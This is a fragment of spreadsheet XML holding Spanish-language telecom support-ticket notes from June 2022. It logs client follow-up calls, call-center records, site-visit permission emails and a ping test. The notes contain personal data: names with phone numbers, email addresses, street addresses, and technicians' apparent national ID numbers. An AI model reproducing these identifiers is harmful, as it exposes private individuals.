    <t>SE LLAMA A CLIENTE ERVIN HERNANDEZ 54230017 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001169153</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ERVIN HERNANDEZ QUIEN INDICA QUE HASTA EL MOMENTO NO HA TENIDO INCONVENIENTES SOLICITA QUE SE LE LLAME A LAS 16:00HRS PARA VALIDAR.
2001123974
COLA:
NOMBRE: A: 54230017
NÚMERO: 54230017
DURACIÓN: 0:00:23
ESTADO: CONECTADA
DETALLES: 54230017
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 14:26:08</t>
  </si>
  <si>
    <t>F4615248</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001098052</t>
  </si>
  <si>
    <t>F4615249</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE VALIDARAN A NIVEL INTERNO POR LO QUE SOLICITA LLAMADA PARA LAS 14:30
-ID 2001098052</t>
  </si>
  <si>
    <t>F4615251</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001130847</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 INDICA QUE ESTA EN UNA REUNION QUE SE LE LLAME A LAS 16:10 NUEVAMENTE **
-ID 2001147260
**</t>
  </si>
  <si>
    <t>F4615252</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE PARA VALIDAR PERO NO SE OBTIENE RESPUESTA
2001199251
COLA:
NÚMERO: 47622581
DURACIÓN: 0:00:06
NOMBRE: A: 47622581
ESTADO: CONECTADA
DETALLES: 47622581
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ELVYNLOPEZ
FECHA Y HORA LOCALES: 24/06/2022 22:57:32</t>
  </si>
  <si>
    <t>F4615266</t>
  </si>
  <si>
    <t>SE LLAMA A CL PR ALEXIS HENRIQUEZ AL 71231953 INDICA QUE CONTINUA CON 8 MEGAS DE VELOCIDAD || SE LE SOLICITA UN MOMENTO PERO CL CORTA LLAMADA || NOTIFICA A GESTOR PARA EL SEGUIMIENTO**
-ID 2001041739
**</t>
  </si>
  <si>
    <t>F4615277</t>
  </si>
  <si>
    <t>CLIENTE JASON PENNANT 56162043 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JASON PENNANT AL 56162043 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001114399 - 2001114764
**</t>
  </si>
  <si>
    <t>F4615278</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE A VALIDAR, A LA ESPERA DE RESPUESTA
ELVYN ARIEL LOPEZ RECINOS
BUEN DÍA ESTIMADO CLIENTE;
SE PROCEDIÓ A CERRAR EL PUERTO 443, SU APOYO CON LAS VALIDACIONES.
SALUDOS</t>
  </si>
  <si>
    <t>F4615289</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LONDY MORATAYA 58269408 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001050500</t>
  </si>
  <si>
    <t>F4615300</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR ESTRADA 47190166  MENCIONA QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO
CLIENTE CONFIRMA QUE DIAGNOSTICARON QUE SE SE TIENE QUE MIGRAR EL SERVICIO POR LO QUE INDICA QUE EL SEGUIMIENTO YA LO ESTA DANDO CON SU EJECUTIVA
CLIENTE SOLICITA YA NO SE LE ESTEN LLAMANDO
-ID 2001057712</t>
  </si>
  <si>
    <t>F4615312</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EMILIO COC 41076686 MENCIONA QUE NO ESTABA ENTERADO DE ESE CAMBIO, SE CONSULTA CON RONALD Y MENCIONA QUE EL CAMBIO DE RUTA YA ESTABA AUTORIZADO POR EL CLIENTE
SE LE MENCIONA A CLIENTE DE DICHA VISITA Y INSISTE EN QUE NO TENIAN INFORMACION
-ID 2001066197</t>
  </si>
  <si>
    <t>F4615318</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911  SOLICITA QUE SE LE LLAME EN 15 MIN **
-ID 2001058072
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE || ENVIA A BUZON
SE INTENTARA LUEGO**
-ID 2001103796
**</t>
  </si>
  <si>
    <t>*/*/*/SE CAMBIA DE ESTADO Y SE NOTIFICA A GESTOR */*/*
COMENTARIO ANTERIOR:
-* -*- CL WLATER REYES 45787911  SOLICITA QUE SE VALIDE NUEVAMENTE SERVICIO POR QUE EL ESTAN OBSERVANDO DEMASIADO BAJO EL CONSUMO  (120KBPS ) -*-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ENCARGADO 4647-5686 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001057664
**</t>
  </si>
  <si>
    <t>F4615324</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE INDICÁNDOLE QUE NO HUBO INTERVENCIÓN TÉCNICA DEL LADO DE PROVEEDOR DE UM, SE LE PIDE CIERRE DEL TICKET.
ASUNTO: RE: FALLA ENLACE MPLS C646 ID 625900035T</t>
  </si>
  <si>
    <t>*/*/*/SE INFORMA A GESTOR QUE ESOS DATOS YA FUERON SOLICITADOS AYER AL CLIENTE Y ENVÍO LOS SIGUIENTES:
DIRECCIÓN: 2ª AVENIDA 7-35 ZONA 1 SANTA CRUZ DEL QUICHÉ.
TELÉFONO: 77554577; 4647-5686.
ATENCIÓN: DE 7:00AM A 10:30PM
REGISTRO FOTOGRÁFICO DEL EQUIPO: NO ES POSIBLE BRINDARLO YA QUE EN ESE PDV ES MUY CONCURRIDO</t>
  </si>
  <si>
    <t>F4615326</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONALD MARROQUIN 61037799 MENCIONA QUE NO HA LOGRADO CONTACTO CON PR PERO MENCIONA QUE EL VIERNES PASADO REALIZARON  LAS PRUEBAS DE PRIMER NIVEL (REINICIO OK, ENERGIA OK) SE SOLICITA DATOS  DE VISITA
-ID 2001692096
NOMBRE DEL CLIENTE: PAGADURIA AUXILIAR FAES DGSVA
UBICACIÓN:LOTIFICACION PALMERA CALLE A ATARRAYA PUERTO EL TRIUNFO SENDEPECA USULUTAN
CONTACTO EN SITIO: CLIENTE ESTARA CONFIRMANDO POR CORREO
HORARIO DE ATENCION: CLIENTE ESTARA CONFIRMANDO EL HORARIO
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO  RONALD.MARROQUIN@MAG.GOB.SV</t>
  </si>
  <si>
    <t>F4615334</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS RIOS AL 22746525 INDICA QUE AUN  PERSISTE EL INCONVENIENTE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE
-ID 2001071265
**</t>
  </si>
  <si>
    <t>F4615351</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARDOQUEO PERO NO SE TIENE RESPUESTA, SERVICIO OPERATIVO A NIVEL WAN
2001192405
COLA:
NOMBRE: A: 53520130
NÚMERO: 55280199
DURACIÓN: 0:00:43
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 24/06/2022 19:39:59</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON GOMEZ AL 77401515 INDICA QUE NO RECIBIO CORREO SE CONFIRMA EL CORREO Y ESTA MAL ESCRITO CORREO CORRECTO ES BGOMEZ@LAUNION.COM.GT SE REENVIA CORREO NUEVAMENTE Y CONFIRMA TAMBIEN BRINDA EL CORREO SOPORTE@LAUNION.COM.GT E IDICA QUE POR AHI NOS RESPONDERA CUANDO SE PROGRAMARA LA VISITA**
-ID 2001143998
**</t>
  </si>
  <si>
    <t>F4615352</t>
  </si>
  <si>
    <t>SE VALIDA SERVICIO PRINCIPAL OPERATIVO, SE VALIDA CON CLIENTE OSCAR GODOY CONFIRMA SERVICIO
&lt;GNCYGTLON2D1D01A02EIM3&gt;PING -C 1000 -S 1500 -M 30 -B -VPN-INSTANCE INTERNET_GT_METRO 10.78.109.124
  PING 10.78.109.124: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.78.109.124 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/21 MS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OSCAR GODOY AL 49392916 SE BRINDA RETROALIMENTACION A CLIENTE **
-ID 2001116190
**</t>
  </si>
  <si>
    <t>**SE LLAMA A NUMERO DE OFICINA 22103911  NO RESPONDE || SE INTENTARA LUEGO**
ID 2001079440
**</t>
  </si>
  <si>
    <t>F4615387</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE LISETH MONTALVA-70498064   MANDA A BUZON 2 VECES ##
2001057785
COLA:
NOMBRE: A: 0050370498064
NÚMERO: 0050370498064
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370498064
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 10:59:26
2001058005
COLA:
NOMBRE: A: 0050370498064
NÚMERO: 0050370498064
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370498064
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 10:59:30</t>
  </si>
  <si>
    <t>SE LLAMA A CLIETNE MARLON RIVAS-78220453 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001146460</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARLON RIVAS-78220453 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001140003</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LISETH MONTALVA-70498064 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001139382</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE MARLON RIVAS-78220453 COEMNTA QUE EL ES EL PROVEEDOR DE LA PBX + OBSERVA QUE EL SERVICIO SE ESTA CAYENDO CADA 10-15 MINUTOS,   EN MODEM ESTADO DE LUCES PERMANECE: PWR VERDE, SINC VERDE PERO CUANDO SE CAE EL SERVICIO SINC QUEDA EN ROJO.
2001058319
COLA:
NOMBRE: A: 0050378220453
NÚMERO: 0050378220453
DURACIÓN: 0:08:16
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050378220453
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/06/2022 11:09:43</t>
  </si>
  <si>
    <t>F4615403</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 15:56
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; 'AGUILAR MENDOZA EMILIO' &lt;EAMENDOZ@UNINET.COM.MX&gt;
CC: 'CNOC INTERNACIONAL' &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: BIMBO INTERNACIONAL - GB_BH_CHOLUTECA - G74-M00006HN-HN0455F-NP-Q (1613945OH) - LINK DOWN || IMBBL004372
*-*-*-*-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE GERARDO MENCIONA QUE PERSISTE EL INCONVENIENTE, SE LE SOLICITA PUEDAN COMPARTIR LAS PRUEBAS POR CORREO
-ID 2001152660</t>
  </si>
  <si>
    <t>SE HABLÓ CON EDGAR HERNÁNDEZ/CLIENTE 00 525551745299 INDICA QUE AÚN SIGUE VIENDO CAÍDO EL SERVICIO, SE LE PIDE PRUEBAS; INDICA QUE ASÍ LO HARÁ, SE INFORMA DE LO DICHO POR CLIENTE A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4615417</t>
  </si>
  <si>
    <t>SE LE INFORMA A CLIENTE JOSE IRIAS 97800818 QUE EL SERVICIO SE OBSERVA ACTIVO PERO LA LLAMADA NO COMPLETA, POSIBLEMENTE POR PBX INHIBIDA, SE LE SOLICITA SU APOYO PARA REINICIAR SU PLANTA PBX, CLIENTE INDICA QUE ESCALARÁ CON SU PROVEEDOR PARA QUE PUEDAN REINICIARLA, SOLICITA SE LE LLAME EN 1 HORA. ID DE LLAMADA: 2001070248</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE ARIAS 97800818 COMENTA QUE EN BREVE VAN A INICIAR A REVISAR LA PBX EN CONJUNTON CON SU PROVEEDOR, SOLICITA SE LE LLAME A LAS 15:00 HORAS. ID DE LLAMADA: 2001100378</t>
  </si>
  <si>
    <t>F4615418</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE IRIAS 97800818 COMENTA QUE EN BREVE VAN A INICIAR A REVISAR LA PBX EN CONJUNTO CON SU PROVEEDOR, SOLICITA SE LE LLAME A LAS 15:00 HORAS. ID DE LLAMADA: 2001100378</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN  PERO NO DA TONO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4615432</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO , GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO PARA EL DÍA MIERCOLES  29/06/2022 A LAS  10:00 AM
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 12:46
PARA: LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 47503902T | TRANSACCIONES Y TRANSFERENCIAS
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO, EL DÍA MIÉRCOLES  29/06/2022  A LAS  10:00 AM , ASÍ TAMBIÉN SOLICITAMOS DE SU APOYO PARA LA APERTURA DEL CAJERO 4827
VISITA:  MIÉRCOLES 29/06/2022  HORARIO 10:00 AM
DIRECCIÓN: CAJERO 4827_KM 136 CTRA CA-2 ALDEA NAHUALATE CHICACAO  SUCHITEPEQUEZ_TANGO STORE
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
PEDROZA MARTINEZ, NERY ALBERTO	699416	1908740660506
SAGATUME AGUILAR, ANNDY FABRISCIO	720005	1960391771001
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO POR 3G, PERSONAL CNOC CLARO DARÁ SEGUIMIENTO CON INGENIERÍA CLARO MAÑANA O BIEN HASTA EL DÍA LUNES EN EL TRANSCURSO DEL DÍA.</t>
  </si>
  <si>
    <t>PERSONAL DE INGENIERÍA CLARO NO LABORÓ HOY; SEGUIMIENTO CON INGENIERÍA MAÑANA EN EL TRANSCURSO DEL DÍA.</t>
  </si>
  <si>
    <t>COORDINADA VISITA TÉCNICA PARA EL DÍA MIÉRCOLES 29 A LAS 10:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4615450</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE ROCIO FLORES QUIEN SOLICITA SE LE LLAME A LAS 18:00HRS PARA VALIDAR.
SE LE INDICO QUE POR PARTE DE CLARO NO HAY INCONVENIENTES.
2001120019
COLA:
NOMBRE: A: 55146683
NÚMERO: 55146683
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 55146683
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 14:13:09</t>
  </si>
  <si>
    <t>SE LLAMO AL LOS DIDS QUE EL CLIENTE REPORTO Y SI COMPLETAN LAS LLAMADAS.
2001183571
COLA:
NOMBRE: A: 22160411
NÚMERO: 22160411
DURACIÓN: 0:00:03
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22160411
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 18:15:54
2001183588
COLA:
NOMBRE: A: 22160410
NÚMERO: 22160410
DURACIÓN: 0:00:03
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22160410
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 18:16:04</t>
  </si>
  <si>
    <t>F4615468</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SRITA. CINDY 41319290 PERO ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001109284
**</t>
  </si>
  <si>
    <t>F4615474</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LESTER BORRAYO AL 34840214 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001117834
**</t>
  </si>
  <si>
    <t>F4615499</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VALERIO MORALES AL 40122142 INFORMA QUE AUN PERSISTE LA INESTABILIDAD SOLCIITA VISITA TECNICA YA QUE INDICA QUE EN EL LUGAR REALIZARON REMODELACIONES Y POSIBLE MOVIERON ALGO .INDICA QUE HOY CIERRAN A LAS 15:00 HRS PERO BRINDA LA SIGUIENTE INFORMACION Y SOLICITA QUE SE LE PROGRAME LA VISITA PARA EL DIA LUNES.
HORARIO DE ATENCION: 8:00 A 15:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADO
DIRECCCION: 21 CALLE 6-77 ZONA 1 EDIFICIO MUNICIPAL NIVEL.3 DEPARTAMENTO ADMINISTRATIVO.
ATENDERA EN SITIO: VALERIO MORALES
-ID 2001105397
**</t>
  </si>
  <si>
    <t>F4615517</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: LUNES, 27 DE JUNIO DE 2022 7:46
PARA: JPROSAL@LOSAGROUP.COM &lt;JPROSAL@LOSAGROUP.COM&gt;; JPROSAL@LOSAGROUP.CO &lt;JPROSAL@LOSAGROUP.CO&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 662600001T |CASCADA, S.A. |KM. 6.8 CARRETERA A EL SALVADOR, RESIDENCIAL ENCINOS CASA 1
BUEN DIA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 662600001T |CASCADA, S.A.   |KM. 6.8 CARRETERA A EL SALVADOR, RESIDENCIAL ENCINOS CASA 1
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS: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HECTOR MISAEL RAMIREZ CARDONA                 710195           2249 23862 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 56740356 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN PABLO 56740356  NO RESPONDE, ENVIA A BUZON
-ID 2001162490</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN PABLO AL 56740356  SOLO INDICA QUE EN ESTE MOMENTO NO PUEDE ATENDER Y CORTA LLAMADA **
-ID 2001118946
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN PABLO 56740356 QUIEN VALIDA SERVICIO OPERATIVO, AUTORIZA CIERRE
2001604882
COLA:
NOMBRE: A: 56740356
NÚMERO: 56740356
DURACIÓN: 0:01:13
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 56740356
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/06/2022 17:20:51</t>
  </si>
  <si>
    <t>###CLIENTE CONFIRMA PERSMISOS##
DE: JUAN PABLO ROSAL &lt;JPROSAL@LOSAGROUP.CO&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 9:33
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; JPROSAL@LOSAGROUP.COM &lt;JPROSAL@LOSAGROUP.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | 662600001T |CASCADA, S.A. |KM. 6.8 CARRETERA A EL SALVADOR, RESIDENCIAL ENCINOS CASA 1
MUCHAS GRACIAS, LES ESPERAMOS.</t>
  </si>
  <si>
    <t>F4615519</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDERSON  OQUELI 36493515 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 2001163371</t>
  </si>
  <si>
    <t>F4615520</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 45787911 PARA VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: C705 - ENLACE RADIO FRECUENCIA INTERNET CLARO - CON ID 38300701</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER RESYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001149233</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE SE ENCUENTRA EN UNA REUNION POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 2001160150</t>
  </si>
  <si>
    <t>NO SE HA DADO SEGUIMIENTO POR PARTE DE CNOC CLARO; POR EL TIEMPO QUE LLEVA SIN DOCUMENTACIÓN; SE ESCALA CON KEVYN FONSECA/TEAM LEADER INDICA QUE NOS APOYARÁ.</t>
  </si>
  <si>
    <t>F4615521</t>
  </si>
  <si>
    <t>SE  ENVIA CORREO A CLEINTE PARA ACCESOS
RE: ENLACE DOWN VCE-GT-ROOSEVELTH
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:JERSON GUTIERREZ &lt;JGUTIERREZ@QUATTRO.COM.GT&gt;;MARLON ESTUARDO RAMOSY 7 MÁS
CC:MISSION CONTROL &lt;MISSIONCONTROL@QUATTRO.COM.GT&gt;;GRUPO N1;CNOCCAY 1 USUARIOS MÁS
SÁB 25/06/2022 18:01
BUEN DIA  ESTIMADO CLIENTE ,
GUSTO ESA SALUDARLE , SOLICITANDO DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA AREA TÉCNICA  PARA TRABAJAR SERVICIO DE  F4615521 | GQ, SOCIEDAD ANONIMA |  887500038T |INTERNET_KM 14.5 CALZADA ROOSEVELT 15-86 ZONA 3 GUATEMALA MIXCO 14.635511355985 -90.5844873181029| ,  SOLICITAMOS  DE SU AMABLE  APOYO GESTIONANDO ACCESOS DÍA LUNES 27/06/2022 A  LAS 09:00 AM
TRAMITAR PERMISOS PARA LOS TÉCNICOS :
DPI	IBM	TECNICO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EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 16:38
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ALEJANDRO CANEL &lt;ACANEL@QUATTRO.COM.GT&gt;
CC: MISSION CONTROL &lt;MISSIONCONTROL@QUATTRO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE DOWN VCE-GT-ROOSEVELTH
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4615524</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL SOTO AL 506 88257142 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001150498 - 2001150688 - 2001151052
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 506 88257142 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001149789
**</t>
  </si>
  <si>
    <t>F4615554</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE +52 55 5174 5290 MENCIONA QUE AUN ESTAN A LA ESPERA POR PARTE DE CLIENTE FINAL
-ID 2001165804</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 16:41
PARA: MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; AGUILAR MENDOZA EMILIO &lt;EAMENDOZ@UNINET.COM.MX&gt;
